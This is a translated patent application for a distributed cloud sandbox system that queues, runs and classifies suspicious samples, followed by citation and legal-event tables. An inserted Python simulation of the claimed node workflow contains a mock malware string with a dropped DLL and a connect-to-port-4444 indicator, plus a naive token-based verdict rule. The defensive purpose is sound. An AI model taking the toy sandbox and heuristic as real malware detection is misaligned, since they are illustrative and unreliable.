Those skilled in the art will appreciate that the present invention includes apparatus for performing one or more of the operations described herein. Such apparatus may be specially designed and manufactured for the required purpose, or may include known devices in a general-purpose computer. Such apparatus has computer programs stored in it that are selectively activated or reconfigured. Such computer programs may be stored in a device-readable (for example, computer-readable) storage medium, or in any type of medium suitable for storing electronic instructions and coupled to a bus, including but not limited to any type of disk (including floppy disks, hard disks, optical disks, CD-ROMs and magneto-optical disks), ROM (Read-Only Memory), RAM (Random Access Memory), EPROM (Erasable Programmable Read-Only Memory), EEPROM (Electrically Erasable Programmable Read-Only Memory), flash memory, magnetic cards or optical cards. That is, a readable medium includes any medium that stores or transmits information in a form readable by a device (for example, a computer).
Those skilled in the art will appreciate that each block in these structural diagrams and/or block diagrams and/or flow diagrams, and combinations of such blocks, can be implemented by computer program instructions. Those skilled in the art will appreciate that these computer program instructions can be provided to a processor of a general-purpose computer, a special-purpose computer or another programmable data processing apparatus, so that the scheme specified in one or more blocks of the structural diagrams and/or block diagrams and/or flow diagrams disclosed in the present invention is executed by the processor of the computer or other programmable data processing apparatus.
Those skilled in the art will appreciate that the various operations, methods, steps in flows, measures and schemes discussed in the present invention can be alternated, changed, combined or deleted. Further, other steps, measures and schemes among the various operations, methods and flows discussed in the present invention can also be alternated, changed, rearranged, decomposed, combined or deleted. Further, steps, measures and schemes in the prior art that correspond to the various operations, methods and flows disclosed in the present invention can also be alternated, changed, rearranged, decomposed, combined or deleted.
The above are only some embodiments of the present invention. It should be noted that those of ordinary skill in the art can make several improvements and modifications without departing from the principles of the invention, and those improvements and modifications should also be regarded as within the protection scope of the present invention.

Claims (10)

1. A method of sample detection, applied to a distributed cloud detection system, characterised in that the distributed cloud detection system includes a plurality of single-node sandboxes, and the method includes:
determining a plurality of pending task information items according to a first preset rule, and sending the plurality of pending task information items to a shared queue;
after at least one request message is received, obtaining from the shared queue the task information corresponding to each request message, executing the tasks distributed to them respectively through the plurality of single-node sandboxes, and obtaining the data produced during task execution;
sending the data produced during the task execution to the corresponding database.
2. The method according to claim 1, characterised in that the manner in which a single-node sandbox executes a task includes:
reading the task information of highest priority;
determining whether the task information of highest priority includes a specific sample;
if it includes a specific sample, modifying the specific parameter environment;
after the modification is complete, determining whether to execute the task according to the current resource usage and the parameter configuration in the task information;
after the task execution is complete, changing the corresponding task status.
3. The method according to claim 2, characterised in that, after the step of determining whether to execute the task according to the current resource usage and the parameter configuration in the task information, the method further includes:
if it is determined that the task is to be executed, running the task in a virtual machine and storing the data produced during the run to a local disk.
4. The method according to claim 2 or 3, characterised in that, after the step of determining whether the task information of highest priority includes a specific sample, the method further includes:
if the task information of highest priority does not include a specific sample but only an md5 identifier, downloading the corresponding sample according to the md5 identifier;
determining, according to the number of tasks currently being executed, whether to execute the task that includes the downloaded sample;
if it is determined that the task including the downloaded sample is to be executed, generating a json file according to the downloaded sample, the json file including the specific information of the task;
generating a report in a specified format according to the specific information of the task, and changing the corresponding task status.
5. The method according to claim 1, characterised in that the method further includes:
sending a task request to a server according to the usage state information of local resources and/or the task backlog status information in a local database, the task request being used to request task information from the server;
receiving the task information returned by the server and storing the task information in the local database.
6. The method according to claim 1, characterised in that the step of sending the data produced during the task execution to the corresponding database includes:
screening, by a second preset rule, the data that belongs to black data among the data produced during the task execution, and sending the data that belongs to black data to a black database.
7. The method according to claim 6, characterised in that the method further includes:
cleaning up the database at every preset time interval.
8. A distributed cloud detection system, characterised in that it includes:
a sandbox cluster entry module, for determining a plurality of pending task information items according to a first preset rule; sending the plurality of pending task information items to a shared queue; and, after at least one request message is received, obtaining from the shared queue the task information corresponding to each request message;
a single-node sandbox module, for executing the tasks distributed to them respectively through a plurality of single-node sandboxes and obtaining the data produced during task execution;
an extensible distributed storage cluster module, further for sending the data produced during task execution by the single-node sandbox module to the corresponding database.
9. The distributed cloud detection system according to claim 8, characterised in that
the single-node sandbox module is specifically for reading the task information of highest priority; determining whether the task information of highest priority includes a specific sample; when it includes a specific sample, modifying the specific parameter environment; after the modification is complete, determining whether to execute the task according to the current resource usage and the parameter configuration in the task information; and after the task execution is complete, changing the corresponding task status.
10. A terminal device, including a memory, a processor and a computer program stored on the memory and runnable on the processor, characterised in that the processor, when executing the program, implements the sample detection method according to any one of claims 1 to 7.
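The node-side flow of claims 2 to 5, as an added example in Python that is not the patent's own code: a node requests task information from the server only when its local backlog is below capacity, takes the highest-priority pending task, either uses the embedded sample (adjusting the parameter environment) or downloads the sample by its md5 identifier, checks the number of running tasks against its capacity, writes the json task specification, runs the sample and produces a report while moving the task through pending, running and finished (or failed). `ENV_DEFAULTS`, `SAMPLE_STORE` (a dictionary standing in for the download server), `run_in_vm` (a token splitter in place of a virtual machine), the report layout and the constructed task list in `demo()` are all assumptions. One check is added that the claims do not mention: the bytes actually downloaded are hashed and compared with the identifier that selected them before anything is executed, because md5 is not collision-resistant and a mismatch here means the wrong sample would be detonated.

```python
import hashlib
import json

ENV_DEFAULTS = {"os": "win7", "net": "off", "timeout_s": 120}   # assumed parameter environment
SAMPLE_STORE = {}   # constructed stand-in for the server a node downloads samples from


def register_sample(data: bytes) -> str:
    md5 = hashlib.md5(data).hexdigest()
    SAMPLE_STORE[md5] = data
    return md5


KNOWN_MD5 = register_sample(b"MZ\x90\x00drop:evil.dll;connect:198.51.100.7:4444")
MISSING_MD5 = "0" * 32   # nothing is stored under this identifier


def run_in_vm(sample: bytes, env: dict) -> list:
    """Stand-in for the virtual machine run of claim 3: one event per ';' token; with the
    network parameter off, outbound connections are reported as blocked."""
    events = [e.strip() for e in sample.decode("latin-1").split(";") if e.strip()]
    if env.get("net") == "off":
        events = ["blocked " + e if e.startswith("connect:") else e for e in events]
    return events


class SandboxNode:
    def __init__(self, max_concurrent: int = 2):
        self.tasks = []                   # local task database of claim 5
        self.running = 0                  # tasks currently executing, checked in claim 4
        self.max_concurrent = max_concurrent
        self.env = dict(ENV_DEFAULTS)
        self.reports = {}

    def backlog(self) -> int:
        return sum(1 for t in self.tasks if t["status"] == "pending")

    def request_tasks(self, server_tasks: list) -> int:
        """Claim 5: request only as many tasks as free capacity and backlog allow."""
        want = max(self.max_concurrent - self.running - self.backlog(), 0)
        pulled = server_tasks[:want]
        del server_tasks[:want]
        for t in pulled:
            t["status"] = "pending"
        self.tasks.extend(pulled)
        return len(pulled)

    def read_highest_priority(self):
        pending = [t for t in self.tasks if t["status"] == "pending"]
        return min(pending, key=lambda t: t["priority"]) if pending else None

    def download_sample(self, md5: str):
        data = SAMPLE_STORE.get(md5)
        # Practitioner check, not in the patent: confirm that the bytes received match the
        # identifier that selected them before anything is executed. md5 is not
        # collision-resistant, so a production pipeline should key samples on sha256 too.
        if data is None or hashlib.md5(data).hexdigest() != md5:
            return None
        return data

    def execute_one(self):
        """One pass of the claim 2/4 flow; returns the task's new status, or None if idle."""
        task = self.read_highest_priority()
        if task is None:
            return None
        if "sample" in task:                              # claim 2: sample embedded
            self.env.update(task.get("env", {}))          # modify the parameter environment
            sample = task["sample"]
        else:                                             # claim 4: md5 identifier only
            sample = self.download_sample(task["md5"])
            if sample is None:
                task["status"] = "failed"
                return task["status"]
        if self.running >= self.max_concurrent:           # resource check; task stays pending
            return "deferred"
        task["status"] = "running"
        self.running += 1
        spec = {"task_id": task["task_id"], "md5": hashlib.md5(sample).hexdigest(),
                "size": len(sample), "env": dict(self.env)}
        task["json"] = json.dumps(spec, sort_keys=True)   # the json file of claim 4
        events = run_in_vm(sample, spec["env"])
        verdict = "black" if any("drop:" in e or "connect:" in e for e in events) else "white"
        self.reports[task["task_id"]] = {"spec": spec, "events": events, "verdict": verdict}
        self.running -= 1
        task["status"] = "finished"                       # claim 2/4: change task status
        return task["status"]


def demo() -> SandboxNode:
    """Drive one node over a constructed server task list until both sides are drained."""
    server = [
        {"task_id": "t1", "priority": 5, "md5": KNOWN_MD5},
        {"task_id": "t2", "priority": 1, "sample": b"write:log.txt;sleep:5", "env": {"net": "on"}},
        {"task_id": "t3", "priority": 3, "md5": MISSING_MD5},
    ]
    node = SandboxNode(max_concurrent=2)
    while node.request_tasks(server) or node.backlog():
        while node.execute_one() not in (None, "deferred"):
            pass
    return node


if __name__ == "__main__":
    for tid, rep in demo().reports.items():
        print(tid, rep["verdict"], rep["events"])
```

In `demo()` the node first pulls two tasks (its capacity), runs the priority-1 task with its embedded sample, then downloads and runs the md5-only task, and only then requests more work; the third task fails at download because its identifier is unknown, so it never reaches the resource check or the virtual machine. `execute_one()` returns `"deferred"` and leaves the task pending when the running count already equals the capacity, which is the decision point of claims 2 and 4.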
CN201710453830.3A 2017-06-15 2017-06-15 The method of terminal device, distributed high in the clouds detecting system and pattern detection Pending CN107171894A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201710453830.3A CN107171894A (en) 2017-06-15 2017-06-15 The method of terminal device, distributed high in the clouds detecting system and pattern detection

Publications (1)

Publication Number Publication Date
CN107171894A true CN107171894A (en) 2017-09-15

Family

ID=59819632

Country Status (1)

Country Link
CN (1) CN107171894A (en)

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101692267A (en) * 2009-09-15 2010-04-07 北京大学 Method and system for detecting large-scale malicious web pages
CN103685251A (en) * 2013-12-04 2014-03-26 电子科技大学 Android malicious software detecting platform oriented to mobile internet
CN104766007A (en) * 2015-03-27 2015-07-08 杭州安恒信息技术有限公司 Method for quickly recovering sandbox based on file system filter driver
CN105453097A (en) * 2013-05-31 2016-03-30 微软技术许可有限责任公司 Restricted driver platform runs drivers in sandbox in user mode
CN105760755A (en) * 2016-02-24 2016-07-13 浪潮通用软件有限公司 Visual Studio extension pack isolation method
CN106557355A (en) * 2016-12-01 2017-04-05 北京奇虎科技有限公司 The generation method and generating means of virtual machine image
CN106650423A (en) * 2016-11-28 2017-05-10 北京奇虎科技有限公司 Object sample file detecting method and device

Cited By (13)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN108021400A (en) * 2017-11-29 2018-05-11 腾讯科技(深圳)有限公司 Data processing method and device, computer-readable storage medium and equipment
CN108021400B (en) * 2017-11-29 2022-03-29 腾讯科技(深圳)有限公司 Data processing method and device, computer storage medium and equipment
CN108040110A (en) * 2017-12-11 2018-05-15 国网宁夏电力有限公司信息通信公司 A kind of mobile data safety means of defence based on security sandbox
CN108040110B (en) * 2017-12-11 2020-10-27 国网宁夏电力有限公司信息通信公司 Mobile data security protection method based on security sandbox
CN108874617B (en) * 2017-12-29 2021-09-21 北京安天网络安全技术有限公司 Detection task distribution method and device, electronic equipment and storage medium
CN108874617A (en) * 2017-12-29 2018-11-23 北京安天网络安全技术有限公司 Detection task distributing method, device, electronic equipment and storage medium
CN108881150A (en) * 2017-12-29 2018-11-23 北京安天网络安全技术有限公司 A kind of processing method of Detection task, device, electronic equipment and storage medium
CN108881150B (en) * 2017-12-29 2021-03-23 北京安天网络安全技术有限公司 Detection task processing method and device, electronic equipment and storage medium
CN108377263A (en) * 2018-02-02 2018-08-07 北京杰思安全科技有限公司 Adaptive private clound sandbox setting method, equipment and medium
CN108429754A (en) * 2018-03-19 2018-08-21 深信服科技股份有限公司 A kind of high in the clouds Distributed Detection method, system and relevant apparatus
CN110247934A (en) * 2019-07-15 2019-09-17 杭州安恒信息技术股份有限公司 The method and system of internet-of-things terminal abnormality detection and response
CN113132324A (en) * 2019-12-31 2021-07-16 奇安信科技集团股份有限公司 Sample identification method and system
CN113132324B (en) * 2019-12-31 2023-04-28 奇安信科技集团股份有限公司 Sample identification method and system

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
RJ01 Rejection of invention patent application after publication

Application publication date: 20170915